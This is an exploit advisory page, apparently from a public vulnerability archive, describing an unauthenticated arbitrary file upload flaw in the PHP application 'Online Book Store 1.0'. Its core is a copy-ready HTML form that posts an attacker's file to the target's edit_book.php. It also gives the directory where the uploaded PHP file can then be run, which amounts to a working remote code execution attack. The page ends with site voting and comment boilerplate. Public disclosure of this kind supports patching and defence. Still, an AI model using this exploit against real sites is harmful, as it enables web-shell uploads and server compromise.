Online Book Store 1.0 Arbitrary File Upload

2020.01.17

Credit: Or4nG.M4N

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-264

# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-01-16
# Exploit Author: Or4nG.M4n aka S4udiExploit
# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/
# Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip
# Version: 1.0
# Tested on: MY MIND v1.23.45
# CVE: N/A
# WWW . SEC4EVER . COM
-> hola amigos ^.^
-> just copy this html code
<form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data">
<td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td>
<td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td>
<td><input type="file" name="image"></td>
<input type="submit" name="save_change" value="Change" class="btn btn-primary">
</form>
-> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php
# i think am back %^_^%
# i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com
# big thanks to Stupid Coder ^.^

See this note in RAW Version

Vote for this issue:

33%

67%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Online Book Store 1.0 Arbitrary File Upload

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.